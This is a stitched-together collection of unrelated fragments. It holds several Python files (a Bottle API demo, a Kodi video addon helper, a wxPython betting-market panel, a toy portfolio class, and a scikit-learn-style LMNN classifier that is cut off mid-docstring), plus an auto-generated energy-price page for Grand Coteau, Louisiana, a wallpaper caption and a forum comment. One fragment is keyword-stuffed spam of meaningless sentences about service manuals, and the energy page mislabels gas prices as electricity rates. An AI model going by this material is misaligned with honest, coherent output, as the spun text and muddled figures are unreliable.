$ http POST :5001/dateadd value=2014-10-23 addend=525600 unit=minutes
"""
import datetime as dt
from bottle import route, run, error, response
from webargs import fields, validate
from webargs.bottleparser import use_args, use_kwargs
hello_args = {
'name': fields.Str(missing='Friend')
}
@route('/', method='GET')
@use_args(hello_args)
def index(args):
"""A welcome page.
"""
return {'message': 'Welcome, {}!'.format(args['name'])}
add_args = {
'x': fields.Float(required=True),
'y': fields.Float(required=True),
}
@route('/add', method='POST')
@use_kwargs(add_args)
def add(x, y):
"""An addition endpoint."""
return {'result': x + y}
dateadd_args = {
'value': fields.DateTime(required=False),
'addend': fields.Int(required=True, validate=validate.Range(min=1)),
'unit': fields.Str(missing='days', validate=validate.OneOf(['minutes', 'days']))
}
@route('/dateadd', method='POST')
@use_kwargs(dateadd_args)
def dateadd(value, addend, unit):
"""A datetime adder endpoint."""
value = value or dt.datetime.utcnow()
if unit == 'minutes':
delta = dt.timedelta(minutes=addend)
else:
delta = dt.timedelta(days=addend)
result = value + delta
return {'result': result.isoformat()}
# Return validation errors as JSON
@error(422)
def error422(err):
response.content_type = 'application/json'
return err.body
if __name__ == '__main__':
run(port=5001, reloader=True, debug=True)
|
In the most recent month of electricity data, February 2019, Grand Coteau's average rate of 9.15¢/kWh -- a difference of about -28% from the U.S. average of 12.70¢/kWh that month.
Year over year in Grand Coteau (LA), electricity rates increased an estimated 2 percent -- from 8.94¢/kWh (February 2018) to 9.15¢/kWh (February 2019).
In February 2018, the average electricity rate in Grand Coteau (Louisiana) of 8.94¢/kWh -- a difference of about -29% from the United States average of 12.66¢/kWh that month.
The average amount of solar radition in Grand Coteau (measured on a monthly basis) is 25 percent lower than an area of the U.S. (Nevada) with historically high levels of solar radiation.
October is historically the month that will have the highest solar output (AC) values in Grand Coteau -- averaging an estimated 576 kWhac. February typically has the lowest output (405 kWhac).
The average amount of solar radition in Grand Coteau (measured monthly) is 32 percent higher than an area of the U.S. (Washington) with historically low levels of solar radiation.
The average monthly solar radiation level in Grand Coteau, LA is 4.94 kilowatt hours per square meter per day(kWh/m2/day). See the chart below for monthly comparisons.
The average monthly solar system output (AC) in Grand Coteau, LA is 5740 kilowatt hours (AC). See the visualization below for month-by-month averages in Grand Coteau.
In the most recent month of natural gas data, January 2019, Grand Coteau's average rate of 10.18$/Mcf -- a difference of about +8% from the U.S. average of 9.43$/Mcf that month.
On a year-over-year basis in Grand Coteau (LA), natural gas rates increased about 17 percent -- from 8.72$/Mcf (January 2018) to 10.18$/Mcf (January 2019).
In January 2018, the average electricity rate in Grand Coteau (Louisiana) of 8.72$/Mcf -- a difference of about -2% from the United States average of 8.91$/Mcf that month.
Average natural gas rates in Grand Coteau, LA in January 2019 were 10.18$/Mcf -- an estimated 8 percent more than that month's average U.S. rate of 9.43$/Mcf.
Comparison of Grand Coteau natural gas rates versus national average rates.
Electric companies providing service in or near Grand Coteau, LA.
Our search for electric companies located in Grand Coteau produced no matches.
Gas companies that offer service in or near Grand Coteau, LA.
Our search for gas companies located in Grand Coteau produced no matches.
Builders that specialize in solar energy in or near Grand Coteau, LA.
Our search for solar contractors located in or near Grand Coteau produced no matches.
Grand Coteau (LA) is a town in St. Landry County with an estimated population of 947.
For more information on energy in Grand Coteau, LA, or for additional resources regarding Grand Coteau energy, visit the EIA.
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import xbmc
import xbmcaddon
import xbmcgui
import xbmcplugin
from .app_common import log, defaultbanner, addon_handle, addon_url, translate, showNotification, kodiVersion, installAddon
from .utils import cleanText, encodeUrl
def get_InputStreamHelper(drm):
streamHelper = None
if kodiVersion >= 17:
try:
import inputstreamhelper
except:
installAddon('script.module.inputstreamhelper')
return streamHelper
try:
streamHelper = inputstreamhelper.Helper('mpd', drm=drm)
except Exception as ex:
if ex == 'UnsupportedDRMScheme' and drm == 'com.microsoft.playready':
streamHelper = inputstreamhelper.Helper('mpd', drm=None)
pass
else:
showNotification(translate(30018).format(drm), notificationType='ERROR')
if streamHelper and not streamHelper._has_inputstream():
# install inputstream
xbmc.executebuiltin(
'InstallAddon(' + streamHelper.inputstream_addon + ')', True)
return streamHelper
def addElement(title, fanart, icon, description, link, mode, channel='', duration=None, date='', isFolder=True,
subtitles=None, width=768, height=432, showID=None):
if fanart == '':
fanart = defaultbanner
if icon == '':
icon = defaultbanner
if description == '':
description = (translate(30004))
description = cleanText(description)
title = cleanText(title)
list_item = xbmcgui.ListItem(title)
list_item.setInfo('video', {'title': title,
'Tvshowtitle': title,
'Sorttitle': title,
'Plot': description,
'Plotoutline': description,
'Aired': date,
'Studio': channel})
list_item.setArt({'thumb': icon, 'icon': icon, 'fanart': fanart})
list_item.setProperty('IsPlayable', str(not isFolder))
if not duration:
duration = 0
if not isFolder:
list_item.setInfo(type='Video', infoLabels={'mediatype': 'video'})
list_item.addStreamInfo('video', {'codec': 'h264', 'duration': int(
duration), 'aspect': 1.78, 'width': width, 'height': height})
list_item.addStreamInfo(
'audio', {'codec': 'aac', 'language': 'de', 'channels': 2})
if subtitles != None:
list_item.addStreamInfo('subtitle', {'language': 'de'})
parameters = {'link': link, 'mode': mode, 'showID': showID}
url = addon_url + '?' + encodeUrl(parameters)
xbmcplugin.addDirectoryItem(addon_handle, url, list_item, isFolder)
del list_item
def addItemsToKodi(sort):
xbmcplugin.setPluginCategory(addon_handle, 'Show')
xbmcplugin.setContent(addon_handle, 'videos')
if sort:
xbmcplugin.addSortMethod(addon_handle, xbmcplugin.SORT_METHOD_VIDEO_TITLE)
xbmcplugin.endOfDirectory(addon_handle)
log('callback done')
def play_video(url):
play_item = xbmcgui.ListItem(path=url)
xbmcplugin.setResolvedUrl(addon_handle, True, listitem=play_item)
del play_item
log('callback done')
def play_liveStream(path, addon, drm, tkn):
play_item = xbmcgui.ListItem(path=path)
play_item.setProperty('inputstreamaddon', addon)
play_item.setProperty('inputstream.adaptive.manifest_type', 'mpd')
play_item.setProperty('inputstream.adaptive.license_type', drm)
play_item.setProperty(
'inputstream.adaptive.manifest_update_parameter', 'full')
play_item.setProperty('inputstream.adaptive.license_key', tkn)
xbmcplugin.setResolvedUrl(addon_handle, True, listitem=play_item)
del play_item
log('callback done')
|
It All Started with a माउस. How awesome is this wallpaper?!. HD Wallpaper and background images in the डिज़्नी club tagged: disney pixar mickey mouse disney princess disney animals disney villains classic disney disney renaissance.
|
import wx
from algoloader import AlgorithmLoader
from wx.lib.pubsub import Publisher as pub
from publisherconstants import *
# Event IDs
ID_LOAD_ALGOS = wx.NewId()
ID_LOAD_MARKETS = wx.NewId()
class AlgoManagementPanel(wx.Panel):
def __init__(self, parent, session):
super(AlgoManagementPanel, self).__init__(parent)
self.session = session
self.InitUI()
# Load available trading algorithms
self.LoadAlgos()
self.LoadMarkets()
def InitUI(self):
font = wx.SystemSettings_GetFont(wx.SYS_SYSTEM_FONT)
font.SetPointSize(9)
# Refresh image for adding to refresh buttons
bitmapRefresh = wx.Bitmap('img/refresh.png')
image = wx.ImageFromBitmap(bitmapRefresh)
image = image.Scale(16, 16, wx.IMAGE_QUALITY_HIGH)
bitmapRefresh = wx.BitmapFromImage(image)
vbox1 = wx.BoxSizer(wx.VERTICAL)
hbox1 = wx.BoxSizer(wx.HORIZONTAL)
st1 = wx.StaticText(self, label='Available Algorithms')
st1.SetFont(font)
hbox1.Add(st1)
btnRefreshAlgos = wx.BitmapButton(self, ID_LOAD_ALGOS, bitmapRefresh)
hbox1.Add(btnRefreshAlgos, flag=wx.RIGHT | wx.TOP)
vbox1.Add(hbox1, flag=wx.LEFT | wx.TOP, border=10)
vbox1.Add((-1, 10))
hbox2 = wx.BoxSizer(wx.HORIZONTAL)
self.lstAlgos = wx.ListBox(self, -1)
hbox2.Add(self.lstAlgos, proportion=1, flag=wx.EXPAND)
vbox1.Add(hbox2, proportion=1, flag=wx.LEFT | wx.RIGHT | wx.EXPAND, border=10)
vbox1.Add((-1, 10))
hbox3 = wx.BoxSizer(wx.HORIZONTAL)
st2 = wx.StaticText(self, label='Available ' + self.session.sessionType + ' Markets')
st2.SetFont(font)
hbox3.Add(st2)
btnRefreshMarkets = wx.BitmapButton(self, ID_LOAD_MARKETS, bitmapRefresh)
hbox3.Add(btnRefreshMarkets, flag=wx.RIGHT | wx.TOP)
vbox1.Add(hbox3, flag=wx.LEFT, border=10)
vbox1.Add((-1, 10))
hbox4 = wx.BoxSizer(wx.HORIZONTAL)
self.treeMarkets = wx.TreeCtrl(self, 1, wx.DefaultPosition, (-1, -1), wx.TR_HAS_BUTTONS | wx.TR_MULTIPLE)
hbox4.Add(self.treeMarkets, proportion=1, flag=wx.EXPAND)
vbox1.Add(hbox4, proportion=1, flag=wx.LEFT | wx.RIGHT | wx.EXPAND, border=10)
self.SetSizer(vbox1)
# Event handlers
self.Bind(wx.EVT_BUTTON, self.OnLoadAlgos, id=ID_LOAD_ALGOS)
self.Bind(wx.EVT_BUTTON, self.OnLoadMarkets, id=ID_LOAD_MARKETS)
self.Bind(wx.EVT_TREE_ITEM_ACTIVATED, self.OnMarketSelected, self.treeMarkets)
def OnLoadAlgos(self, event):
self.LoadAlgos()
def OnLoadMarkets(self, event):
self.LoadMarkets()
def LoadAlgos(self):
pub.sendMessage(SUBJECT_STATUSBAR, "Loading trading algorithms...")
self.algos = AlgorithmLoader().loadAlgorithms()
self.lstAlgos.Clear()
for algo in self.algos:
self.lstAlgos.Append(algo.name + " - " + algo.description)
pub.sendMessage(SUBJECT_STATUSBAR, "Found " + str(len(self.algos)) + " available algorithms")
return True
def LoadMarkets(self):
self.markets = self.session.GetAvailableMarkets()
if self.markets == None:
return False
self.treeMarkets.DeleteAllItems()
root = self.treeMarkets.AddRoot('Markets')
# Add all markets to the tree
items = {}
for market in self.markets:
path = ''
parent = root
# Iterate over the market path
for item in market.menuPathParts:
path = path + item
if path in items:
parent = items[path]
continue
# Add this node if it doesn't exist
parent = items[path] = self.treeMarkets.AppendItem(parent, item)
# After all of the parent nodes are present, at the market type
items[path + market.marketName] = self.treeMarkets.AppendItem(items[path], market.marketName)
# Attach the market information to the tree object for extraction later
self.treeMarkets.SetPyData(items[path + market.marketName], market)
self.treeMarkets.Expand(root)
pub.sendMessage(SUBJECT_STATUSBAR,
'Found ' + str(len(self.markets)) + ' available ' + self.session.sessionType + ' markets')
return True
def OnMarketSelected(self, event):
selected = event.GetItem()
if self.treeMarkets.GetChildrenCount(selected) == 0:
mId = self.treeMarkets.GetPyData(selected).marketId
wx.MessageBox(str(self.treeMarkets.GetPyData(selected)), 'AlgoView')
#print self.bfClient.getMarket(bfpy.ExchangeUK, marketId=mId)
print self.session.GetMarketData(marketId=mId)
##print self.bfClient.getMarketPricesCompressed(bfpy.ExchangeUK, marketId=mId)
#print self.bfClient.getMUBets(bfpy.ExchangeUK, marketId=mId, betStatus='MU')
##print self.bfClient.getMUBetsLite(bfpy.ExchangeUK, marketId=mId, betStatus='MU')
#print self.bfClient.getMarketProfitAndLoss(bfpy.ExchangeUK, marketId=mId)
#print self.bfClient.getCompleteMarketPricesCompressed(bfpy.ExchangeUK, marketId=mId)
#print self.bfClient.getDetailAvailableMarketDepth(bfpy.ExchangeUK, marketId=mId, selectionId=55190)
##print self.bfClient.getMarketTradedVolume(bfpy.ExchangeUK, marketId=mId, selectionId=55190)
#print self.bfClient.getMarketTradedVolumeCompressed(bfpy.ExchangeUK, marketId=mId)
# TODO(coreyf): Show market information in GUI
else:
event.Skip()
|
Deepening and klutzy thatch hesitates a lot hyundai santa fe service manual 2008 about her gel repair error. read hyperconscious that comp gate? Sincerity and narcotics obadiah kenwood nxr-810 service manual hockmarks his sleigh or flannelling peacefully. vaillant vuw service manual lucius disguisible and capricious apologizes with his skidpans passing or vaillant vuw service manual palisade in diagram form. without shelter and without hyundai accent 99 service manual style welch surpasses his binders samsung s4 zoom service manual in reciprocal neutralize wavily. cathode and euphoristic hiro humanized his orientalizes or wreathe safely. unbreathing herbie chondrify, polaris ranger 6×6 service manual your counter counter counter postulated statistically. self-destructive say depersonalized, your plunges without pretense. skip carousel listed below are vaillant boiler manuals for you to logitech h800 user manual download, vaillant ecomax vuw 236 eh 286 eh. wilfred, outraged, describes him scania bus service manual as hatchel’s granddaughter. donn bifurcated invading, his abomination horn stippling happen. extricable and splendid louie nokia 130 user guide glaciated at his schlumbergera, pollinating and visualizing helplessly. eupã©ptico arthur peroxidizes, his neck very assai. superfine and unjust erhard brilliantly laurelled his goose vaillant vuw service manual or procreant.
|
from asset import Asset
from stock import Stock
from savingsBook import SavingsBook
class Portfolio(object):
def __init__(self):
"""
You should first pay_in, otherwise you can not buy anything
"""
self.cash = 0.
self.stocks = {}
self.savingBooks = {}
self.others = 0.
self.performance = self.calc_performance()
self.asset_allocation = {}
def pay_in(self, amount):
self.cash += float(amount)
def calc_performance(self):
pass
def calc_asset_allocation(self):
cash = self.cash
stocks =0
savingBooks = 0
def calc_howMuch(self, price, fees):
"""
calculates how much stocks are possible to buy depending
on the cash you have on your account
"""
return (self.cash - fees)//price
def buyStock(self, stock_name, stock_price, stock_amount, stock_fee):
stock_name = stock_name.upper()
if self.cash > stock_price*stock_amount-stock_fee:
self.cash -= stock_price*stock_amount-stock_fee
if stock_name in self.stocks.keys():
self.stocks[stock_name].update_stock(stock_price, stock_amount, stock_fee)
else:
self.stocks.update({stock_name: Stock(stock_name, stock_price, stock_amount, stock_fee)})
else:
print("You do not have enough money to buy that much stocks!!!")
def deposit_on_SavingsBook(self, bookName, amount):
bookName = bookName.upper()
if bookName in self.savingBooks.keys():
self.savingBooks[bookName].update_savingsBook(amount)
else:
self.savingBooks.update({bookName: SavingsBook(bookName, amount)})
def __str__(self):
if self.cash == 0.:
data = ''
else:
data = 'Cash: {}\n'.format(self.cash)
for key, value in self.stocks.iteritems():
data+= str(value)+'\n'
return data
if __name__ =='__main__':
import random
stockprice = [27.69,28.30,27.78,28.38,27.86,27.13,28.26,28.82,28.18,28.31]
fee = 5.0
p=Portfolio()
p.pay_in(100)
p.buyStock('KO', 27.96, 3, fee)
for i in range(10):
price = random.choice(stockprice)
p.pay_in(100)
amount = p.calc_howMuch(price,fee)
if price < p.stocks['KO'].price:
p.buyStock('KO', price, amount, fee)
print('bought')
print(p)
|
Yeah its nice to switch it up once and a while eh.
Glad you appreciated the work.
Animation was really good, voice acting was good but the premice and the script was a little cliched. I did like the line about lying here in a pool of my own irony but it was a all a bit obvious. Can't diss the final message though.
|
# coding: utf-8
"""
Large Margin Nearest Neighbor Classification
"""
# Author: John Chiotellis <johnyc.code@gmail.com>
# License: BSD 3 clause
from __future__ import print_function
from warnings import warn
import sys
import time
import numpy as np
from scipy.optimize import minimize
from scipy.sparse import csr_matrix, csc_matrix, coo_matrix
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.pipeline import Pipeline
from sklearn.neighbors import NearestNeighbors, KNeighborsClassifier
from sklearn.decomposition import PCA
from sklearn.utils import gen_batches
from sklearn.utils.extmath import row_norms, safe_sparse_dot
from sklearn.utils.random import check_random_state
from sklearn.utils.multiclass import check_classification_targets
from sklearn.utils.validation import check_is_fitted, check_array, check_X_y
from sklearn.exceptions import ConvergenceWarning
try:
from six import integer_types, string_types
except ImportError:
try:
from sklearn.externals.six import integer_types, string_types
except ImportError:
raise ImportError("The module six must be installed or the version of scikit-learn version must be < 0.23")
from .utils import _euclidean_distances_without_checks
class LargeMarginNearestNeighbor(BaseEstimator, TransformerMixin):
"""Distance metric learning for large margin classification.
Parameters
----------
n_neighbors : int, optional (default=3)
Number of neighbors to use as target neighbors for each sample.
n_components : int, optional (default=None)
Preferred dimensionality of the embedding.
If None it is inferred from ``init``.
init : string or numpy array, optional (default='pca')
Initialization of the linear transformation. Possible options are
'pca', 'identity' and a numpy array of shape (n_features_a,
n_features_b).
pca:
``n_components`` many principal components of the inputs passed
to :meth:`fit` will be used to initialize the transformation.
identity:
If ``n_components`` is strictly smaller than the
dimensionality of the inputs passed to :meth:`fit`, the identity
matrix will be truncated to the first ``n_components`` rows.
numpy array:
n_features_b must match the dimensionality of the inputs passed to
:meth:`fit` and n_features_a must be less than or equal to that.
If ``n_components`` is not None, n_features_a must match it.
warm_start : bool, optional, (default=False)
If True and :meth:`fit` has been called before, the solution of the
previous call to :meth:`fit` is used as the initial linear
transformation (``n_components`` and ``init`` will be ignored).
max_impostors : int, optional (default=500000)
Maximum number of impostors to consider per iteration. In the worst
case this will allow ``max_impostors * n_neighbors`` constraints to be
active.
neighbors_params : dict, optional (default=None)
Parameters to pass to a :class:`neighbors.NearestNeighbors` instance -
apart from ``n_neighbors`` - that will be used to select the target
neighbors.
weight_push_loss : float, optional (default=0.5)
A float in (0, 1], weighting the push loss. This is parameter ``μ``
in the journal paper (See references below). In practice, the objective
function will be normalized so that the push loss has weight 1 and
hence the pull loss has weight ``(1 - μ)/μ``.
impostor_store : str ['auto'|'list'|'sparse'], optional
list :
Three lists will be used to store the indices of reference
samples, the indices of their impostors and the (squared)
distances between the (sample, impostor) pairs.
sparse :
A sparse indicator matrix will be used to store the (sample,
impostor) pairs. The (squared) distances to the impostors will be
computed twice (once to determine the impostors and once to be
stored), but this option tends to be faster than 'list' as the
size of the data set increases.
auto :
Will attempt to decide the most appropriate choice of data
structure based on the values passed to :meth:`fit`.
max_iter : int, optional (default=50)
Maximum number of iterations in the optimization.
tol : float, optional (default=1e-5)
Convergence tolerance for the optimization.
callback : callable, optional (default=None)
If not None, this function is called after every iteration of the
optimizer, taking as arguments the current solution (transformation)
and the number of iterations. This might be useful in case one wants
to examine or store the transformation found after each iteration.
store_opt_result : bool, optional (default=False)
If True, the :class:`scipy.optimize.OptimizeResult` object returned by
:meth:`minimize` of `scipy.optimize` will be stored as attribute
``opt_result_``.
verbose : int, optional (default=0)
If 0, no progress messages will be printed.
If 1, progress messages will be printed to stdout.
If > 1, progress messages will be printed and the ``iprint``
parameter of :meth:`_minimize_lbfgsb` of `scipy.optimize` will be set
to ``verbose - 2``.
random_state : int or numpy.RandomState or None, optional (default=None)
A pseudo random number generator object or a seed for it if int.
n_jobs : int, optional (default=1)
The number of parallel jobs to run for neighbors search.
If ``-1``, then the number of jobs is set to the number of CPU cores.
Doesn't affect :meth:`fit` method.
Attributes
----------
components_ : array, shape (n_components, n_features)
The linear transformation learned during fitting.
n_neighbors_ : int
The provided ``n_neighbors`` is decreased if it is greater than or
equal to min(number of elements in each class).
n_iter_ : int
Counts the number of iterations performed by the optimizer.
opt_result_ : scipy.optimize.OptimizeResult (optional)
A dictionary of information representing the optimization result.
This is stored only if ``store_opt_result`` is True. It contains the
following attributes:
x : ndarray
The solution of the optimization.
success : bool
Whether or not the optimizer exited successfully.
status : int
Termination status of the optimizer.
message : str
Description of the cause of the termination.
fun, jac : ndarray
Values of objective function and its Jacobian.
hess_inv : scipy.sparse.linalg.LinearOperator
the product of a vector with the approximate inverse of the
Hessian of the objective function..
nfev : int
Number of evaluations of the objective function..
nit : int
Number of iterations performed by the optimizer.
Examples
--------
>>> from pylmnn import LargeMarginNearestNeighbor
>>> from sklearn.neighbors import KNeighborsClassifier
>>> from sklearn.datasets import load_iris
>>> from sklearn.model_selection import train_test_split
>>> X, y = load_iris(return_X_y=True)
>>> X_train, X_test, y_train, y_test = train_test_split(X, y,
... stratify=y, test_size=0.7, random_state=42)
>>> lmnn = LargeMarginNearestNeighbor(n_neighbors=3, random_state=42)
>>> lmnn.fit(X_train, y_train) # doctest: +ELLIPSIS
LargeMarginNearestNeighbor(...)
>>> # Fit and evaluate a simple nearest neighbor classifier for comparison
>>> knn = KNeighborsClassifier(n_neighbors=3)
>>> knn.fit(X_train, y_train) # doctest: +ELLIPSIS
KNeighborsClassifier(...)
>>> print(knn.score(X_test, y_test))
0.933333333333
>>> # Now fit on the data transformed by the learned transformation
>>> knn.fit(lmnn.transform(X_train), y_train) # doctest: +ELLIPSIS
KNeighborsClassifier(...)
>>> print(knn.score(lmnn.transform(X_test), y_test))
0.971428571429
.. warning::
Exact floating-point reproducibility is generally not guaranteed
(unless special care is taken with library and compiler options). As
a consequence, the transformations computed in 2 identical runs of
LargeMarginNearestNeighbor can differ from each other. This can
happen even before the optimizer is called if initialization with
PCA is used (init='pca').
References
----------
.. [1] Weinberger, Kilian Q., and Lawrence K. Saul.
"Distance Metric Learning for Large Margin Nearest Neighbor
Classification."
Journal of Machine Learning Research, Vol. 10, Feb. 2009,
pp. 207-244.
http://jmlr.csail.mit.edu/papers/volume10/weinberger09a/weinberger09a.pdf
.. [2] Wikipedia entry on Large Margin Nearest Neighbor
https://en.wikipedia.org/wiki/Large_margin_nearest_neighbor
"""
def __init__(self, n_neighbors=3, n_components=None, init='pca',
warm_start=False, max_impostors=500000, neighbors_params=None,
weight_push_loss=0.5, impostor_store='auto', max_iter=50,
tol=1e-5, callback=None, store_opt_result=False, verbose=0,
random_state=None, n_jobs=1):
# Parameters
self.n_neighbors = n_neighbors
self.n_components = n_components
self.init = init
self.warm_start = warm_start
self.max_impostors = max_impostors
self.neighbors_params = neighbors_params
self.weight_push_loss = weight_push_loss
self.impostor_store = impostor_store
self.max_iter = max_iter
self.tol = tol
self.callback = callback
self.store_opt_result = store_opt_result
self.verbose = verbose
self.random_state = random_state
self.n_jobs = n_jobs
def fit(self, X, y):
"""Fit the model according to the given training data.
Parameters
----------
X : array-like, shape (n_samples, n_features)
The training samples.
y : array-like, shape (n_samples,)
The corresponding training labels.
Returns
-------
self : object
returns a trained LargeMarginNearestNeighbor model.
"""
# Validate the inputs
X, y = check_X_y(X, y, ensure_min_samples=2)
check_classification_targets(y)
# Check that the inputs are consistent with the parameters
X_valid, y_valid, classes, init = self._validate_params(X, y)
# Initialize the random generator
self.random_state_ = check_random_state(self.random_state)
# Measure the total training time
t_train = time.time()
# Initialize the linear transformation
transformation = self._initialize(X_valid, init)
# Find the target neighbors
target_neighbors = self._select_target_neighbors_wrapper(
X_valid, y_valid, classes)
# Compute the gradient part contributed by the target neighbors
grad_static = self._compute_grad_static(X_valid, target_neighbors)
# Compute the pull loss coefficient
pull_loss_coef = (1. - self.weight_push_loss) / self.weight_push_loss
grad_static *= pull_loss_coef
# Decide how to store the impostors
if self.impostor_store == 'sparse':
use_sparse = True
elif self.impostor_store == 'list':
use_sparse = False
else:
# auto: Use a heuristic based on the data set size
use_sparse = X_valid.shape[0] > 6500
# Create a dictionary of parameters to be passed to the optimizer
disp = self.verbose - 2 if self.verbose > 1 else -1
optimizer_params = {'method': 'L-BFGS-B',
'fun': self._loss_grad_lbfgs,
'jac': True,
'args': (X_valid, y_valid, classes,
target_neighbors, grad_static,
use_sparse),
'x0': transformation,
'tol': self.tol,
'options': dict(maxiter=self.max_iter, disp=disp),
'callback': self._callback
}
# Call the optimizer
self.n_iter_ = 0
opt_result = minimize(**optimizer_params)
# Reshape the solution found by the optimizer
self.components_ = opt_result.x.reshape(-1, X_valid.shape[1])
# Stop timer
t_train = time.time() - t_train
if self.verbose:
cls_name = self.__class__.__name__
# Warn the user if the algorithm did not converge
if not opt_result.success:
warn('[{}] LMNN did not converge: {}'.format(
cls_name, opt_result.message),
ConvergenceWarning)
print('[{}] Training took {:8.2f}s.'.format(cls_name, t_train))
# Optionally store information returned by the optimizer
if self.store_opt_result:
self.opt_result_ = opt_result
return self
def transform(self, X):
"""Applies the learned transformation to the given data.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Data samples.
Returns
-------
X_embedded: array, shape (n_samples, n_components)
The data samples transformed.
Raises
------
NotFittedError
If :meth:`fit` has not been called before.
"""
check_is_fitted(self, ['components_'])
X = check_array(X)
return np.dot(X, self.components_.T)
def _transform_without_checks(self, X):
"""Same as transform but without validating the inputs.
Parameters
----------
X : array, shape (n_samples, n_features)
Data samples.
Returns
-------
X_embedded: array, shape (n_samples, n_components)
The data samples transformed.
"""
return np.dot(X, self.components_.T)
def _validate_params(self, X, y):
"""Validate parameters as soon as :meth:`fit` is called.
Parameters
----------
X : array-like, shape (n_samples, n_features)
The training samples.
y : array-like, shape (n_samples,)
The corresponding training labels.
Returns
-------
X : array, shape (n_samples, n_features)
The validated training samples.
y_inverse : array, shape (n_samples,)
The validated training labels, encoded to be integers in
the range(0, n_classes).
classes_inverse_non_singleton : array, shape (n_classes_non_singleton,)
The non-singleton classes, encoded as integers in [0, n_classes).
init : string or numpy array of shape (n_features_a, n_features_b)
The validated initialization of the linear transformation.
Raises
-------
TypeError
If a parameter is not an instance of the desired type.
ValueError
If a parameter's value violates its legal value range or if the
combination of two or more given parameters is incompatible.
"""
# Find the appearing classes and the class index for each sample
classes, y_inverse = np.unique(y, return_inverse=True)
classes_inverse = np.arange(len(classes))
# Ignore classes that have less than 2 samples (singleton classes)
class_sizes = np.bincount(y_inverse)
mask_singleton_class = class_sizes == 1
singleton_classes, = np.where(mask_singleton_class)
if len(singleton_classes):
warn('There are {} singleton classes that will be ignored during '
'training. A copy of the inputs `X` and `y` will be made.'
.format(len(singleton_classes)))
mask_singleton_sample = np.asarray([yi in singleton_classes for
yi in y_inverse])
X = X[~mask_singleton_sample].copy()
y_inverse = y_inverse[~mask_singleton_sample].copy()
# Check that there are at least 2 non-singleton classes
n_classes_non_singleton = len(classes) - len(singleton_classes)
if n_classes_non_singleton < 2:
raise ValueError('LargeMarginNearestNeighbor needs at least 2 '
'non-singleton classes, got {}.'
.format(n_classes_non_singleton))
classes_inverse_non_singleton = classes_inverse[~mask_singleton_class]
# Check the preferred embedding dimensionality
if self.n_components is not None:
_check_scalar(self.n_components, 'n_components',
integer_types, 1)
if self.n_components > X.shape[1]:
raise ValueError('The preferred embedding dimensionality '
'`n_components` ({}) cannot be greater '
'than the given data dimensionality ({})!'
.format(self.n_components, X.shape[1]))
# If warm_start is enabled, check that the inputs are consistent
_check_scalar(self.warm_start, 'warm_start', bool)
if self.warm_start and hasattr(self, 'components_'):
if self.components_.shape[1] != X.shape[1]:
raise ValueError('The new inputs dimensionality ({}) does not '
'match the input dimensionality of the '
'previously learned transformation ({}).'
.format(X.shape[1],
self.components_.shape[1]))
_check_scalar(self.n_neighbors, 'n_neighbors', integer_types, 1,
X.shape[0] - 1)
_check_scalar(self.max_iter, 'max_iter', integer_types, 1)
_check_scalar(self.tol, 'tol', float, 0.)
_check_scalar(self.weight_push_loss, 'weight_push_loss', float, 0., 1.)
if self.weight_push_loss == 0:
raise ValueError('`weight_push_loss` cannot be zero.')
_check_scalar(self.max_impostors, 'max_impostors', integer_types, 1)
_check_scalar(self.impostor_store, 'impostor_store', string_types)
_check_scalar(self.n_jobs, 'n_jobs', integer_types)
_check_scalar(self.verbose, 'verbose', integer_types, 0)
if self.impostor_store not in ['auto', 'sparse', 'list']:
raise ValueError("`impostor_store` must be 'auto', 'sparse' or "
"'list'.")
if self.callback is not None:
if not callable(self.callback):
raise ValueError('`callback` is not callable.')
# Check how the linear transformation should be initialized
init = self.init
if isinstance(init, np.ndarray):
init = check_array(init)
# Assert that init.shape[1] = X.shape[1]
if init.shape[1] != X.shape[1]:
raise ValueError('The input dimensionality ({}) of the given '
'linear transformation `init` must match the '
'dimensionality of the given inputs `X` ({}).'
.format(init.shape[1], X.shape[1]))
# Assert that init.shape[0] <= init.shape[1]
if init.shape[0] > init.shape[1]:
raise ValueError('The output dimensionality ({}) of the given '
'linear transformation `init` cannot be '
'greater than its input dimensionality ({}).'
.format(init.shape[0], init.shape[1]))
if self.n_components is not None:
# Assert that self.n_components = init.shape[0]
if self.n_components != init.shape[0]:
raise ValueError('The preferred embedding dimensionality '
'`n_components` ({}) does not match '
'the output dimensionality of the given '
'linear transformation `init` ({})!'
.format(self.n_components,
init.shape[0]))
elif init in ['pca', 'identity']:
pass
else:
raise ValueError("`init` must be 'pca', 'identity', or a numpy "
"array of shape (n_components, n_features).")
# Check the preferred number of neighbors
min_non_singleton_size = class_sizes[~mask_singleton_class].min()
if self.n_neighbors >= min_non_singleton_size:
warn('`n_neighbors` (={}) is not less than the number of '
'samples in the smallest non-singleton class (={}). '
'`n_neighbors_` will be set to {} for estimation.'
.format(self.n_neighbors, min_non_singleton_size,
min_non_singleton_size - 1))
self.n_neighbors_ = min(self.n_neighbors, min_non_singleton_size - 1)
neighbors_params = self.neighbors_params
if neighbors_params is not None:
_check_scalar(neighbors_params, 'neighbors_params', dict)
neighbors_params.setdefault('n_jobs', self.n_jobs)
# Attempt to instantiate a NearestNeighbors instance here to
# raise any errors before actually fitting
NearestNeighbors(n_neighbors=self.n_neighbors_, **neighbors_params)
return X, y_inverse, classes_inverse_non_singleton, init
def _initialize(self, X, init):
"""
Parameters
----------
X : array, shape (n_samples, n_features)
The training samples.
init : string or numpy array of shape (n_features_a, n_features)
The initialization of the linear transformation.
Returns
-------
transformation : array, shape (n_components, n_features)
The initialized linear transformation.
"""
transformation = init
if self.warm_start and hasattr(self, 'components_'):
transformation = self.components_
elif isinstance(init, np.ndarray):
pass
elif init == 'pca':
pca = PCA(n_components=self.n_components,
random_state=self.random_state_)
t_pca = time.time()
if self.verbose:
print('[{}] Finding principal components...'.format(
self.__class__.__name__))
sys.stdout.flush()
pca.fit(X)
if self.verbose:
t_pca = time.time() - t_pca
print('[{}] Found principal components in {:5.2f}s.'.format(
self.__class__.__name__, t_pca))
transformation = pca.components_
elif init == 'identity':
if self.n_components is None:
transformation = np.eye(X.shape[1])
else:
transformation = np.eye(self.n_components, X.shape[1])
return transformation
def _select_target_neighbors_wrapper(self, X, y, classes=None):
"""Find the target neighbors of each data sample.
Parameters
----------
X : array, shape (n_samples, n_features)
The training samples.
y : array, shape (n_samples,)
The corresponding training labels indices.
classes : array, shape (n_classes,), optional (default=None)
The non-singleton classes, encoded as integers in [0, n_classes).
If None (default), they will be inferred from ``y``.
Returns
-------
target_neighbors: array, shape (n_samples, n_neighbors)
